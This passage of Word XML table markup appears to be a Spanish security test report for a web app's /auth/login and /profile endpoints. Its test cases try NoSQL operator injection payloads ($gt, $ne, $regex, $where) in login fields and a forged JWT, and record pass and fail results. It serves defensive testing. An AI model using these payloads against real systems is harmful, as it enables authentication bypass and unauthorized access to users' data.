        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-02 — Inyección NoSQL en campo email del login</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</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Backend corriendo.
Usuario registrado en BD.</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1. POST /auth/login con email: {$gt: ""}, password: "cualquiera".
2. Verificar código HTTP y ausencia de token.</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HTTP 401. Sin campo token en respuesta.</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HTTP 401. Sin token. Operador ejecutado pero bloqueado por fallo de auth.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST con email:{$ne:null}, password:{$ne:null}.
2. Verificar código HTTP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401. Sin token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 401. Sin token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login</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Backend corriendo.</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1. POST con email:{$regex:".*"}, password:"x".
2. Verificar código HTTP.</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HTTP 401. Sin token.</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HTTP 401. Sin token.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login
[DEF POTENCIAL]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Backend corriendo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. POST con email:{$where:"sleep(1)"}, password:"x".
2. Verificar que no retorne HTTP 500.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP ≠ 500 (sin exposición de error interno).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 500 Internal Server Error. Información de error interna expuesta.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
POST /auth/login
[DEF POTENCIAL]</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Backend corriendo.</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1. POST con email:{$gt:""} (objeto, no string).
2. Verificar validación de tipo.</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HTTP 400 (rechazo por tipo inválido).</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HTTP 401 (query ejecutado sin validar tipo. Operador NoSQL enviado a MongoDB).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FCE4D6" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="C00000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">falla</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">TC-SEC-03 — Acceso a datos de otro usuario por ID manipulado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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Backend corriendo.
Usuarios A y B registrados y con JWT.</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1. GET /profile sin Authorization.
2. Verificar rechazo.</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HTTP 401 Unauthorized.</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HTTP 401. {"error":"Unauthorized"}.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Token válido de UserA.
UserB registrado en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /profile con JWT de UserA.
2. Verificar que retorne datos de A, no de B.
3. Verificar ausencia de campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. email === userA@test.com. Sin campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. {"email":"userA@test.com","username":"userA","elo":1200}. Sin password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile</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JWT_SECRET conocido.
UserB en BD.</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1. Forjar JWT con userId de UserB usando JWT_SECRET.
2. GET /profile con token forjado.
3. Verificar si accede a datos de B.</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HTTP 200 retornando datos de UserB (documenta riesgo si JWT_SECRET se filtra).</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HTTP 200. {"email":"userB@test.com"}. Token forjado válido — riesgo de filtración de JWT_SECRET.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Autenticación
GET /profile/search</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Token de UserA.
UserB en BD.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1. GET /profile/search?username=userB&amp;exact=true con JWT de A.
2. Verificar ausencia de campo password en resultados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. Ningún resultado contiene campo password.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HTTP 200. {"results":[{"username":"userB","elo":1200}]}. Sin campo password en resultados.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="E2EFDA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="60"/>
              <w:left w:type="dxa" w:w="60"/>
              <w:bottom w:type="dxa" w:w="60"/>
              <w:right w:type="dxa" w:w="60"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00B050"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">aprobado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="6"/>
            <w:shd w:fill="003DA5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
